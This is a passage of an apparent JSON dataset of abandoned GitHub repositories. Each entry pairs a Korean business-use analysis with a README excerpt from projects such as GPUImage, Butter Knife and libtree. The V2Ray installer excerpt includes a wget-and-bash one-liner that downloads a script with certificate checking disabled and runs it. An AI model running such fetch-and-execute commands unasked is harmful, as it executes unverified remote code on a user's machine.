Linux|v3.15+|`tiramisu`|\r\n|NixOS|stable|`nixos.tiramisu`|\r\n\r\nDon't see your distribution? Check to make sure it wasn't forgotten at [repology](https://repology.org/projects/?search=tiramisu).\r\nAlternatively, build from source.\r\n\r\n```sh\r\n$ git clone https://github.com/Sweets/tiramisu\r\n$ c","composite_score":0.4839,"license_safety_tag":"safe"},{"name":"wulabing/V2Ray_ws-tls_bash_onekey","github_url":"https://github.com/wulabing/V2Ray_ws-tls_bash_onekey","stars":16,"language":"Shell","license":"MIT","abandonment_months":20,"description":"","readme_excerpt":"## V2Ray 基于 Nginx 的 vmess+ws+tls 一键安装脚本\n\n> 感谢 JetBrains 提供的非商业开源软件开发授权\n\n> Thanks for non-commercial open source development authorization by JetBrains\n\n## 由于 Nginx 前置导致的嵌套 tls 可能会出现连接阻断，目前仅推荐使用 reality ，建议移步到以下地址\nhttps://github.com/wulabing/xray_docker\n\n### 关于 VMess MD5 认证信息 淘汰机制\n> 自 2022 年 1 月 1 日起，服务器端将默认禁用对于 MD5 认证信息 的兼容。任何使用 MD5 认证信息的客户端将无法连接到禁用 VMess MD5 认证信息的服务器端。\n\n受到影响的用户，我们强烈建议您重新安装，并设置alterid为0（默认值目前已经修改为0），不再使用 VMess MD5 认证机制\n如果您不想重新安装，您可以通过使用 https://github.com/KukiSa/VMess-fAEAD-disable 强制开启对于 MD5 认证机制的兼容\n\n### Telegram 群组\n* telegram 交流群:https://t.me/wulabing_v2ray \n* telegram 更新公告频道：https://t.me/wulabing_channel\n\n### 准备工作\n* 准备一个域名，并将A记录添加好。\n* [V2ray官方说明](https://www.v2ray.com/)，了解 TLS WebSocket 及 V2ray 相关信息\n* 安装好 wget\n\n### 安装/更新方式（h2 和 ws 版本已合并）\nVmess+websocket+TLS+Nginx+Website\n```\nwget -N --no-check-certificate -q -O install.sh \"https://raw.githubusercontent.com/wulabing/V2Ray_ws-tls_bash_onekey/master/install.sh\" && chmod +x install.sh && bash install.sh\n```\n\nVLESS+webso","composite_score":0.4834,"license_safety_tag":"safe"},{"name":"BradLarson/GPUImage","github_url":"https://github.com/BradLarson/GPUImage","stars":8,"language":"Objective-C","license":"bsd-3-clause","abandonment_months":28,"description":"# GPUImage 저장소 분석\n\n## 왜 보물인가\n스마트폰 카메라로 찍은 사진과 영상을 빠르고 예쁘게 보정하는 기술의 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 인스타그램, 스냅챗 같은 사진 필터 앱 제작 및 판매\n2. **내부 업무 도구**: 대량의 상품 사진을 자동으로 보정하는 전자상거래 업체 시스템\n3. **API 판","readme_excerpt":"# GPUImage #\n\n<div style=\"float: right\"><img src=\"http://sunsetlakesoftware.com/sites/default/files/GPUImageLogo.png\" /></div>\n\n<a href=\"https://zenodo.org/record/10416#.U5YGaF773Md\"><img src=\"https://zenodo.org/badge/doi/10.5281/zenodo.10416.svg\" /></a>\n\nBrad Larson\n\nhttp://www.sunsetlakesoftware.com\n\n[@bradlarson](https://twitter.com/bradlarson)\n\ncontact@sunsetlakesoftware.com\n\n## Overview ##\n\nThe GPUImage framework is a BSD-licensed iOS library that lets you apply GPU-accelerated filters and other effects to images, live camera video, and movies. In comparison to Core Image (part of iOS 5.0), GPUImage allows you to write your own custom filters, supports deployment to iOS 4.0, and has a simpler interface. However, it currently lacks some of the more advanced features of Core Image, such as facial detection.\n\nFor massively parallel operations like processing images or live video frames, GPUs have some significant performance advantages over CPUs. On an iPhone 4, a simple image filter","composite_score":0.4828,"license_safety_tag":"safe"},{"name":"JakeWharton/butterknife","github_url":"https://github.com/JakeWharton/butterknife","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":33,"description":"# Butterknife 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱 개발 시 반복적인 코드 작성을 자동으로 줄여주는 도구로, 개발 생산성을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n1. **안드로이드 앱 개발 교육 플랫폼**: 초보 개발자들이 더 쉽게 앱을 만들 수 있도록 돕는 온라인 강좌 서비스\n2. **모바일 앱 개발사의 내부 도구**: 개발팀","readme_excerpt":"Butter Knife\n============\n\n**Attention**: This tool is now deprecated. Please switch to\n[view binding](https://developer.android.com/topic/libraries/view-binding).\nExisting versions will continue to work, obviously, but only critical bug fixes for integration\nwith AGP will be considered. Feature development and general bug fixes have stopped.\n\n![Logo](website/static/logo.png)\n\nField and method binding for Android views which uses annotation processing to generate boilerplate\ncode for you.\n\n * Eliminate `findViewById` calls by using `@BindView` on fields.\n * Group multiple views in a list or array. Operate on all of them at once with actions,\n   setters, or properties.\n * Eliminate anonymous inner-classes for listeners by annotating methods with `@OnClick` and others.\n * Eliminate resource lookups by using resource annotations on fields.\n\n```java\nclass ExampleActivity extends Activity {\n  @BindView(R.id.user) EditText username;\n  @BindView(R.id.pass) EditText password;\n\n  @BindString(R.","composite_score":0.4823,"license_safety_tag":"safe"},{"name":"tengmaoqing/vite-plugin-qiankun","github_url":"https://github.com/tengmaoqing/vite-plugin-qiankun","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":24,"description":"# vite-plugin-qiankun 분석\n\n## 왜 보물인가\n여러 개의 웹 애플리케이션을 마치 하나처럼 통합 관리할 수 있게 해주는 기술로, 대규모 서비스를 효율적으로 구축할 때 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 하나의 계정으로 여러 기능 모듈(CRM, 회계, HR)에 접근하는 통합 업무 플랫폼\n- **내부 업무 ","readme_excerpt":"#### 简介\n\n> vite-plugin-qiankun: 帮助应用快速接入乾坤的vite插件\n\n- 保留vite构建es模块的优势\n- 一键配置，不影响已有的vite配置\n- 支持vite开发环境\n\n#### 快速开始\n\n###### 1、在 `vite.config.ts` 中安装插件\n```typescript\n// vite.config.ts\n\nimport qiankun from 'vite-plugin-qiankun';\n\nexport default {\n  // 这里的 'myMicroAppName' 是子应用名，主应用注册时AppName需保持一致\n  plugins: [qiankun('myMicroAppName')],\n  // 生产环境需要指定运行域名作为base\n  base: 'http://xxx.com/'\n}\n```\n###### 2、在入口文件里面写入乾坤的生命周期配置\n\n```typescript\n// main.ts\nimport { renderWithQiankun, qiankunWindow } from 'vite-plugin-qiankun/dist/helper';\n\n// some code\nrenderWithQiankun({\n  mount(props) {\n    console.log('mount');\n    render(props);\n  },\n  bootstrap() {\n    console.log('bootstrap');\n  },\n  unmount(props: any) {\n    console.log('unmount');\n    const { container } = props;\n    const mountRoot = container?.querySelector('#root');\n    ReactDOM.unmountComponentAtNode(\n      mountRoot || document.querySelector('#root'),\n    );\n  },\n});\n\nif (!qiankunWindow.__POWERED_BY_QIANKUN__) {\n  render({});\n}\n```\n\n###### ","composite_score":0.4823,"license_safety_tag":"safe"},{"name":"facebookresearch/ClassyVision","github_url":"https://github.com/facebookresearch/ClassyVision","stars":5,"language":"Python","license":"MIT","abandonment_months":23,"description":"# ClassyVision 상용화 분석\n\n## 왜 보물인가\n페이스북 연구팀이 만든 이 도구는 사진과 영상에서 물체를 자동으로 인식하는 기술을 누구나 쉽게 사용할 수 있게 만들어놨습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 이미지 분류 SaaS 서비스**\n- 의류 쇼핑몰이 상품 사진을 자동으로 분류하고 검색 가능하게 해주는 웹서비스로 판매\n\n**2. 보안 ","readme_excerpt":"<p align=\"center\"><img width=\"50%\" src=\"website/static/img/cv-logo.png\" /></p>\n<p align=\"center\">\n <a href=\"https://github.com/facebookresearch/ClassyVision/blob/main/LICENSE\">\n  <img src=\"https://img.shields.io/badge/license-MIT-blue.svg\" alt=\"GitHub license\" />\n </a>\n <a href=\"https://github.com/facebookresearch/ClassyVision/blob/main/CONTRIBUTING.md\">\n  <img src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg\" alt=\"PRs Welcome\" />\n </a>\n</p>\n\n## Classy Vision is no longer actively maintained.\n\nThe latest stable version is 0.7.0 and is available on pip, and has been tested to work with Pytorch 2.0.\n\n## What's New:\n\n- March 2021: Added [RegNetZ models](https://arxiv.org/abs/2103.06877)\n- November 2020: [Vision Transformers](https://openreview.net/forum?id=YicbFdNTTy) now available, with training [recipes](https://github.com/facebookresearch/ClassyVision/tree/main/examples/vit)!\n\n<details>\n <summary><b>\n  2020-11-20: Classy Vision v0.5 Released\n </b></summary>\n\n#### New Featu","composite_score":0.4823,"license_safety_tag":"safe"},{"name":"BlackrockDigital/startbootstrap-sb-admin-2","github_url":"https://github.com/BlackrockDigital/startbootstrap-sb-admin-2","stars":5,"language":"HTML","license":"mit","abandonment_months":23,"description":"# BlackrockDigital/startbootstrap-sb-admin-2 분석\n\n## 왜 보물인가\n누구나 쉽게 웹사이트 관리 페이지를 만들 수 있는 설계도(템플릿)로, 많은 기업들이 이미 검증한 안정적인 기초 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 관리자 대시보드 SaaS**\n여러 기업이 사용하는 클라우드 기반 관리 서비스(예: 매출, 직","readme_excerpt":"# [Start Bootstrap - SB Admin 2](https://startbootstrap.com/theme/sb-admin-2/)\n\n[SB Admin 2](https://startbootstrap.com/theme/sb-admin-2/) is an open source admin dashboard theme for [Bootstrap](https://getbootstrap.com/) created by [Start Bootstrap](https://startbootstrap.com/).\n\nFor the legacy Bootstrap 3 version of this theme, you can view the [last stable release](https://github.com/StartBootstrap/startbootstrap-sb-admin-2/releases/tag/v3.3.7%2B1) of SB Admin 2 for Bootstrap 3.\n\n## Preview\n\n[![SB Admin 2 Preview](https://assets.startbootstrap.com/img/screenshots/themes/sb-admin-2.png)](https://startbootstrap.github.io/startbootstrap-sb-admin-2/)\n\n**[Launch Live Preview](https://startbootstrap.github.io/startbootstrap-sb-admin-2/)**\n\n## Status\n\n[![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/StartBootstrap/startbootstrap-sb-admin-2/master/LICENSE)\n[![npm version](https://img.shields.io/npm/v/startbootstrap-sb-admin-2.svg)](htt","composite_score":0.4815,"license_safety_tag":"safe"},{"name":"guestwalk/libffm","github_url":"https://github.com/guestwalk/libffm","stars":5,"language":"C++","license":"BSD-3-Clause","abandonment_months":22,"description":"# libffm 저장소 분석\n\n## 왜 보물인가\n기계학습을 통해 데이터의 숨겨진 패턴을 찾아내는 기술로, 마케팅 타겟팅이나 추천 시스템처럼 실제 비즈니스 문제를 해결하는 데 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **광고 플랫폼 SaaS**: 온라인 광고를 어떤 사람에게 보여줄지 자동으로 최적화하는 서비스\n2. **전자상거래 추천 API","readme_excerpt":"Table of Contents\r\n=================\r\n\r\n- What is LIBFFM\r\n- Overfitting and Early Stopping\r\n- Installation\r\n- Data Format\r\n- Command Line Usage\r\n- Examples\r\n- OpenMP and SSE\r\n- Building Windows Binaries\r\n- FAQ\r\n\r\n\r\nWhat is LIBFFM\r\n==============\r\n\r\nLIBFFM is a library for field-aware factorization machine (FFM). \r\n\r\nField-aware factorization machine is a effective model for CTR prediction. It has been used to win the top-3 positions\r\nof following competitions:\r\n\r\n    * Criteo: https://www.kaggle.com/c/criteo-display-ad-challenge\r\n\r\n    * Avazu: https://www.kaggle.com/c/avazu-ctr-prediction\r\n\r\n    * Outbrain: https://www.kaggle.com/c/outbrain-click-prediction\r\n\r\n    * RecSys 2015: http://dl.acm.org/citation.cfm?id=2813511&dl=ACM&coll=DL&CFID=941880276&CFTOKEN=60022934\r\n\r\nYou can find more information about FFM in the following paper / slides:\r\n\r\n    * http://www.csie.ntu.edu.tw/~r01922136/slides/ffm.pdf\r\n\r\n    * http://www.csie.ntu.edu.tw/~cjlin/papers/ffm.pdf\r\n\r\n    * https://arxiv.org","composite_score":0.4814,"license_safety_tag":"safe"},{"name":"JacksonTian/fks","github_url":"https://github.com/JacksonTian/fks","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":30,"description":"# JacksonTian/fks 상용화 분석\n\n## 왜 보물인가\n코드 작성 없이 복잡한 업무 자동화를 구현할 수 있는 도구로, 중소기업의 업무 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 제조업체를 위한 주문 관리 자동화 플랫폼으로 월구독 형태 제공\n2. **내부 업무 도구**: 금융회사의 반복적인 데이","readme_excerpt":"Frontend Knowledge Structure\n========\n## 项目起源\n还记得@jayli 的这幅前端知识结构图么。\n\n![前端知识结构](https://raw.github.com/JacksonTian/fks/master/figures/fks.jpg)\n\n图片的形式具有诸多的不便。缺失源图的我们，无法为此图贡献些什么，随着时间的迁移，或许有些技术点会发生改变，所以有了这个GitHub项目。我们可以通过协作的方式来共同维护这个项目。Git的历史记录也可以见证前端行业的一些变迁。\n\n[可视化效果](http://html5ify.com/fks/fks_chart/)\n\n## 前端开发知识结构\n- 前端工程师\n    - 浏览器\n        - IE6/[7](http://www.microsoft.com/en-us/download/internet-explorer-7-details.aspx)/[8](http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-8)/[9](http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages)/[10](http://windows.microsoft.com/en-US/internet-explorer/ie-10-worldwide-languages)/[11](http://windows.microsoft.com/en-US/internet-explorer/ie-11-worldwide-languages) (Trident) / [Edge](https://www.microsoft.com/en-us/windows/microsoft-edge) (EdgeHTML)\n        - [Firefox](http://www.mozilla.org/en-US/) (Gecko)\n        - [Chrome](http://www.google.com/chrome)/[Chromium](http://www.chromium.org/) (Blink)\n","composite_score":0.481,"license_safety_tag":"unknown"},{"name":"meething/meething","github_url":"https://github.com/meething/meething","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":24,"description":"# meething/meething 보물 지도\n\n## 왜 보물인가\n온라인 회의나 협업 상황에서 참석자들이 효과적으로 소통하고 정보를 공유할 수 있는 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 회사 내 팀 회의용 협업 플랫폼으로 구독 모델로 판매\n2. **내부 업무 도구**: 대규모 기업의 HR·마케팅팀이 정기 회의 효율화","readme_excerpt":"<img src=\"https://i.imgur.com/XS79fTC.png\" width=200> <img width=\"100\" alt=\"mozilla-builders\" src=\"https://user-images.githubusercontent.com/1423657/81992335-85346480-9643-11ea-8754-8275e98e06bc.png\">\n\n\n# Meething : dWebRTC\n\nMeething is a semi-decentralized conference bridge using modern WebRTC, [GunDB](http://gun.eco) and [MediaSoup](https://mediasoup.org/) to produce a hybrid MESH-SFU with strong privacy, zero user data retention and powerful off-grid capabilities.\n\n<img src=\"https://user-images.githubusercontent.com/1423657/78457103-3260a800-76a8-11ea-8c7a-c909c88ba716.png\" width=500>\n\n## Status\n* Working Status, _still dWeb-x-perimental!_\n* Project Selected by [Mozilla Spring Builders MVP Lab](https://builders.mozilla.community/springlab/index.html) :heart:\n* Contributors and Testers welcome! Join or open an [issue](https://github.com/meething/webrtc-gun/issues) for more!\n\n<a href=\"https://us.meething.space\" target=\"_blank\">\n<img src=\"https://user-images.githubusercontent.com/14236","composite_score":0.481,"license_safety_tag":"safe"},{"name":"FormidableLabs/webpack-dashboard","github_url":"https://github.com/FormidableLabs/webpack-dashboard","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":22,"description":"# webpack-dashboard 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 파일들을 정리하는 과정을 시각적으로 보여주어, 개발자들이 문제를 빠르게 찾고 해결할 수 있게 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발팀 협업 도구 SaaS**\n- 여러 개발자가 함께 일할 때 빌드 상태를 실시간으로 공유하는 웹 대시보드 서비","readme_excerpt":"[![Webpack Dashboard — Formidable, We build the modern web](https://raw.githubusercontent.com/FormidableLabs/webpack-dashboard/master/webpack-dashboard-Hero.png)](https://formidable.com/open-source/)\n\n[![npm version][npm_img]][npm_site]\n[![Actions Status][actions_img]][actions_site]\n[![Coverage Status][cov_img]][cov_site]\n[![Maintenance Status][maintenance-image]](#maintenance-status)\n\nA CLI dashboard for your webpack dev server\n\n### What's this all about?\n\nWhen using webpack, especially for a dev server, you are probably used to seeing something like this:\n\n![https://i.imgur.com/p1uAqkD.png](https://i.imgur.com/p1uAqkD.png)\n\nThat's cool, but it's mostly noise and scrolly and not super helpful. This plugin changes that. Now when you run your dev server, you basically work at NASA:\n\n![https://i.imgur.com/qL6dXJd.png](https://i.imgur.com/qL6dXJd.png)\n\n### Install\n\n```sh\n$ npm install --save-dev webpack-dashboard\n# ... or ...\n$ yarn add --dev webpack-dashboard\n```\n\n> ℹ️ **Note**: You can ","composite_score":0.4806,"license_safety_tag":"safe"},{"name":"vagabond-systems/jpmc-task-2","github_url":"https://github.com/vagabond-systems/jpmc-task-2","stars":13,"language":"Python","license":"NOASSERTION","abandonment_months":23,"description":"","readme_excerpt":"","composite_score":0.4799,"license_safety_tag":"unknown"},{"name":"socketio/socket.io-client","github_url":"https://github.com/socketio/socket.io-client","stars":5,"language":"","license":"mit","abandonment_months":23,"description":"# Socket.IO Client 저장소 분석\n\n## 왜 보물인가\n실시간 양방향 통신이 필요한 모든 웹 서비스(채팅, 알림, 협업 도구 등)의 핵심 기술로, 개발자들이 복잡한 기술 구현 없이 즉시 사용할 수 있는 검증된 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 팀 협업 SaaS**\n- 실시간 문서 공동 편집, 즉각적인 팀원 알림 기능 구현으로 협업","readme_excerpt":"This repository and its history have been merged into the [Socket.IO monorepo](https://github.com/socketio/socket.io).\n","composite_score":0.4795,"license_safety_tag":"safe"},{"name":"haampie/libtree","github_url":"https://github.com/haampie/libtree","stars":74,"language":"C","license":"MIT","abandonment_months":23,"description":"# haampie/libtree 분석 보고서\n\n## 왜 보물인가\n컴퓨터 프로그램이 필요로 하는 모든 부품(라이브러리)을 자동으로 찾아서 시각화해주는 도구로, 복잡한 소프트웨어 구조를 한눈에 파악할 수 있게 만듭니다.\n\n## 어디에 쓸 수 있나\n\n**1. 소프트웨어 품질 검사 서비스**\n개발사들이 자신의 프로그램에 문제없는 부품들만 사용하는지 확인하는 온라인","readme_excerpt":"# libtree\n\nA tool that:\n- :deciduous_tree: turns `ldd` into a tree\n- :point_up: explains how shared libraries are found or why they cannot be located\n\n![Screenshot of libtree](doc/screenshot.png)\n\n\n## Output\n\nBy default, certain standard dependencies are not shown. For more verbose output use\n\n-  `libtree -v`             Show libraries skipped by default\n-  `libtree -vv`            Show dependencies of libraries skipped by default\n-  `libtree -vvv`           Show dependencies of already encountered libraries\n\nUse the `--path` or `-p` flags to show paths rather than sonames:\n\n- `libtree -p $(which tar)`\n\nUse `--max-depth` to limit the recursion depth.\n\n\n## Install\n\n- [Prebuilt binaries for **v3.1.1**](https://github.com/haampie/libtree/releases/tag/v3.1.1)\n  | arch    | sha256sum |\n  |---------|-----------|\n  | [aarch64 (linux)](https://github.com/haampie/libtree/releases/download/v3.1.1/libtree_aarch64) | `c5d4fbcd4e3fb46f02c028532f60fcf1c92f7c6aad5b07a991c67550c2554862` |\n  | [armv6l ","composite_score":0.4793,"license_safety_tag":"safe"},{"name":"olkal/HX711_ADC","github_url":"https://github.com/olkal/HX711_ADC","stars":290,"language":"C++","license":"MIT","abandonment_months":22,"description":"# HX711_ADC 저장소 분석\n\n## 왜 보물인가\n저울이나 무게 측정 기기에서 정확한 데이터를 읽어내는 핵심 칩을 쉽게 제어할 수 있게 해주는 오픈소스 코드입니다.\n\n## 어디에 쓸 수 있나\n1. **스마트 저울 제조사**: 정확한 무게 측정이 필요한 IoT 저울 개발에 HX711 칩 제어 기술을 적용\n2. **반려동물 모니터링 서비스**: 반려동물의 ","readme_excerpt":"Latest release and change log here: https://github.com/olkal/HX711_ADC/releases\n\nThis an Arduino library for the HX711 24-bit ADC for weight scales.\nData retrieval from the HX711 is done without blocking the mcu, also on the 10SPS rate setting and with Multiple HX711's performing conversions simultaneously.\nTare function can also be performed without blocking the mcu.\n \nFiltering and smoothing: \"Moving average\" method from a rolling data set combined with removal of high/low outliers is used for the retrieved value.\n\nSelectable values in the config.h file:\n- Moving average data set of 1, 2, 4, 8, 16, 32, 64 or 128 samples (default:16).\n- Ignore high outlier; one sample is added to the data set, the peak high value of all samples in the data set is ignored (default:1)\n- Ignore low outlier; one sample is added to the data set, the peak low value of all samples in the data set is ignored (default:1)\n- Enable delay for writing to sck pin. This could be required for faster mcu's like the ES","composite_score":0.4788,"license_safety_tag":"safe"},{"name":"mhausenblas/kcf","github_url":"https://github.com/mhausenblas/kcf","stars":11,"language":"Go","license":"Apache-2.0","abandonment_months":20,"description":"","readme_excerpt":"# Kubernetes cluster fleet viewer\n\nClusters are the new cattle and we should have tooling available that allows us to quickly get an idea what's going in a fleet of such clusters.\n\n## What is this about?\n\nMeet `fleet`, a simple CLI tool that provides you with the status and configuration of a fleet of Kubernetes clusters. For example: \n\n```sh\n$ kubectl fleet\nCLUSTER                                                      VERSION       NODES NAMESPACES PROVIDER      API\nkind-kind-3                                                  v1.16.3       1/1   4          kind          https://127.0.0.1:32769\ntest-cluster-2                                               v1.16.2       1/1   4          minikube      https://192.168.64.4:8443\nkind-test2                                                   v1.16.3       1/1   4          kind          https://127.0.0.1:32768\nminikube                                                     v1.16.2       1/1   4          minikube      https://192.168.64.3:8443\ngke_k","composite_score":0.4787,"license_safety_tag":"safe"},{"name":"eriklindernoren/PyTorch-YOLOv3","github_url":"https://github.com/eriklindernoren/PyTorch-YOLOv3","stars":8,"language":"Python","license":"GPL-3.0","abandonment_months":18,"description":"# PyTorch-YOLOv3 사업화 분석\n\n## 왜 보물인가\n사진이나 영상에서 물체를 자동으로 찾아내는 기술로, 보안카메라, 자동차 자율주행, 공장 품질검사 등 다양한 산업에서 실제로 돈을 버는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 건설 현장 안전 관리 SaaS**\n- 건설현장 CCTV에서 인력, 장비, 위험 상황을 실시간 자동 감지하는 월 ","readme_excerpt":"# PyTorch YOLO\nA minimal PyTorch implementation of YOLOv3, with support for training, inference and evaluation.\n\nYOLOv4 and YOLOv7 weights are also compatible with this implementation.\n\n[![CI](https://github.com/eriklindernoren/PyTorch-YOLOv3/actions/workflows/main.yml/badge.svg)](https://github.com/eriklindernoren/PyTorch-YOLOv3/actions/workflows/main.yml) [![PyPI pyversions](https://img.shields.io/pypi/pyversions/pytorchyolo.svg)](https://pypi.python.org/pypi/pytorchyolo/) [![PyPI license](https://img.shields.io/pypi/l/pytorchyolo.svg)](LICENSE)\n\n## Installation\n### Installing from source\n\nFor normal training and evaluation we recommend installing the package from source using a poetry virtual environment.\n\n```bash\ngit clone https://github.com/eriklindernoren/PyTorch-YOLOv3\ncd PyTorch-YOLOv3/\npip3 install poetry --user\npoetry install\n```\n\nYou need to join the virtual environment by running `poetry shell` in this directory before running any of the following commands without the `poet","composite_score":0.4773,"license_safety_tag":"restricted"},{"name":"google/omaha","github_url":"https://github.com/google/omaha","stars":5,"language":"C++","license":"apache-2.0","abandonment_months":22,"description":"# Google Omaha 저장소 분석\n\n## 왜 보물인가\nGoogle이 만든 소프트웨어 자동 업데이트 시스템으로, 사용자가 신경 쓰지 않아도 프로그램이 자동으로 최신 버전을 받게 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 소프트웨어 회사들이 수천 사용자에게 자동으로 새 기능을 배포할 때\n2. **내부 업무 ","readme_excerpt":"# Omaha\n\n## This is not an official Google product.\n\nOmaha is the open-source version of Google Update, a program to install requested software and keep it up to date.  The Google-branded version of Omaha is used to support software patching (both background updating, and on-demand update checks) for Google Chrome, Earth, and a variety of other Google products on Windows 7, 8, and 10.\n\nFor a quick overview of how Omaha works, you can see [this unofficial tutorial](https://fman.io/blog/google-omaha-tutorial/). Please note that it was written by a third party so we cannot guarantee its availability, accuracy or safety.\n\nWe know that keeping software updated is both important and hard, and so by open-sourcing this project, our hope is that perhaps we can help others solve this problem. So, if you'd like to get involved, or even use Omaha to support your own software projects, then just follow the instructions in the [Developer Setup Guide](https://github.com/google/omaha/blob/master/doc/D","composite_score":0.4771,"license_safety_tag":"safe"},{"name":"akshaybahadur21/Socratic","github_url":"https://github.com/akshaybahadur21/Socratic","stars":8,"language":"Python","license":"MIT","abandonment_months":23,"description":"# Socratic 저장소 분석\n\n## 왜 보물인가\n학생들이 문제를 풀 때 단계별로 설명해주는 AI 튜터 역할을 하는 교육 기술로, 온라인 학습 시장의 성장세를 타고 수익화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독형 학습 앱으로 학생들에게 실시간 문제 풀이 도움 제공\n2. **내부 업무 도구**: 기업 교육팀의 직원","readme_excerpt":"<div align=\"center\">\n\n<p align=\"center\"> <img src=\"https://github.com/akshaybahadur21/Socratic/blob/main/resources/socratic.png\" width=\"300px\"></p>\n\n</div>\n\n[![](https://img.shields.io/github/license/sourcerer-io/hall-of-fame.svg?colorB=ff0000)](https://github.com/akshaybahadur21/Emojinator/blob/master/LICENSE.md)  [![](https://img.shields.io/badge/Akshay-Bahadur-brightgreen.svg?colorB=ff0000)](https://akshaybahadur.com)\n\nA simple Mathematical utility for Humans\n\n## Code Requirements 🦄\nYou can install Conda for python which resolves all the dependencies for machine learning.\n\n`pip install -r requirements.txt`\n\n## Modules\n- Socratic Equation Solver\n- Socratic Plotter\n\n## Socratic Equation Solver\n\n#### Description 🐦\nNeed to get unstuck? This Socratic can help! This learning module, inspired by Google AI​, helps you understand your school work at a high school and university level.\nThe Socratic module utilizes artificial intelligence to accurately predict which concepts will help a studen","composite_score":0.4768,"license_safety_tag":"safe"},{"name":"Gictorbit/photoshopCClinux","github_url":"https://github.com/Gictorbit/photoshopCClinux","stars":8,"language":"Shell","license":"GPL-2.0","abandonment_months":23,"description":"# Gictorbit/photoshopCClinux 분석\n\n## 왜 보물인가\n리눅스 운영체제에서 Adobe Photoshop을 무료로 사용할 수 있게 만드는 프로젝트로, 고가의 그래픽 디자인 소프트웨어에 접근하기 어려운 사람들에게 새로운 기회를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 대학교나 온라인 디자인 강좌에서 학생들이 비","readme_excerpt":"\n<div align=\"center\" class=\"tip\" markdown=\"1\" style>\n\n![screenshot](images/Screenshot.png)\n\n![wine version](https://img.shields.io/badge/wine-%E2%96%B25.22-red) ![Tested on arch](https://img.shields.io/badge/Tested%20on-Archlinux-brightgreen) ![GitHub stars](https://img.shields.io/github/stars/Gictorbit/photoshopCClinux) ![rep size](https://img.shields.io/github/repo-size/gictorbit/photoshopCClinux) ![bash](https://img.shields.io/badge/bash-5.0-yellowgreen)\n</div>\n\n# Photoshop CC v19 installer for Linux\nThis bash script helps you to install Photoshop CC version 19 on your Linux machine using wine behind the scene\nand sets some necessary components up for the best performance\n\n## :rocket: Features\n* downloads necessary components and installs them (`vcrun`, `atmlib`, `msxml`...)\n* downloads `photoshop.exe` installer\n* creates photoshop command and a desktop entry\n* wine dark mode\n* supports graphic cards like (`intel`, `Nvidia`)\n* saves the downloaded files in your cache directory\n* It'","composite_score":0.4767,"license_safety_tag":"restricted"},{"name":"mwshinn/paranoidscientist","github_url":"https://github.com/mwshinn/paranoidscientist","stars":6,"language":"Python","license":"MIT","abandonment_months":23,"description":"# Paranoid Scientist 분석 보고서\n\n## 왜 보물인가\n과학 연구나 데이터 분석 시 실수를 자동으로 찾아내고 검증해주는 똑똑한 검사 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 대학이나 연구기관이 구독하는 온라인 논문 검증 플랫폼으로 운영\n2. **내부 업무 도구**: 제약회사나 의료기관의 임상시험 데이터 자동 검수","readme_excerpt":"# <img alt=\"Paranoid Scientist\" src=\"https://raw.githubusercontent.com/mwshinn/paranoidscientist/master/doc/images/paranoid_scientist_mini_small.png\" width=\"400\">\n\nParanoid Scientist is a Python module for verifying scientific\nsoftware which provides:\n\n- Runtime **verification of entry and exit conditions** written in\n  pure Python, including hyperproperties.\n- Conditions specified using pure Python **refinement types**,\n  i.e. types are defined by predicates.\n- **Automated unit testing** of individual functions.\n\nTo learn more, read the [documentation](https://paranoid-scientist.readthedocs.io/en/latest/), [conceptual FAQs](https://paranoid-scientist.readthedocs.io/en/latest/conceptfaq.html), [technical FAQs](https://paranoid-scientist.readthedocs.io/en/latest/techfaq.html), or [tutorial](https://paranoid-scientist.readthedocs.io/en/latest/tutorial.html), or see the [paper](https://link.springer.com/chapter/10.1007%2F978-3-030-41600-3_10)/[preprint](https://arxiv.org/abs/1909.00427) f","composite_score":0.4763,"license_safety_tag":"safe"},{"name":"buunguyen/octotree","github_url":"https://github.com/buunguyen/octotree","stars":11,"language":"JavaScript","license":"agpl-3.0","abandonment_months":24,"description":"# Octotree 사업화 분석\n\n## 왜 보물인가\nGitHub에서 파일 구조를 폴더처럼 쉽게 탐색할 수 있는 도구로, 개발자들이 코드를 읽을 때 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: GitHub 코드 리뷰 효율성을 높이는 웹 기반 IDE 플러그인 구독 서비스\n- **내부 업무 도구**: 대규모 코드베이스","readme_excerpt":"## About\n\nBrowser extension that enhances GitHub code review and exploration. You can download Octotree for your browser from [our website](https://www.octotree.io).\n\n[![Chrome](assets/chrome.png \"Chrome\")](https://chrome.google.com/webstore/detail/octotree/bkhaagjahfmjljalopjnoealnfndnagc)\n[![Firefox](assets/firefox.png \"Firefox\")](https://addons.mozilla.org/en-US/firefox/addon/octotree/)\n[![Edge](assets/edge.png 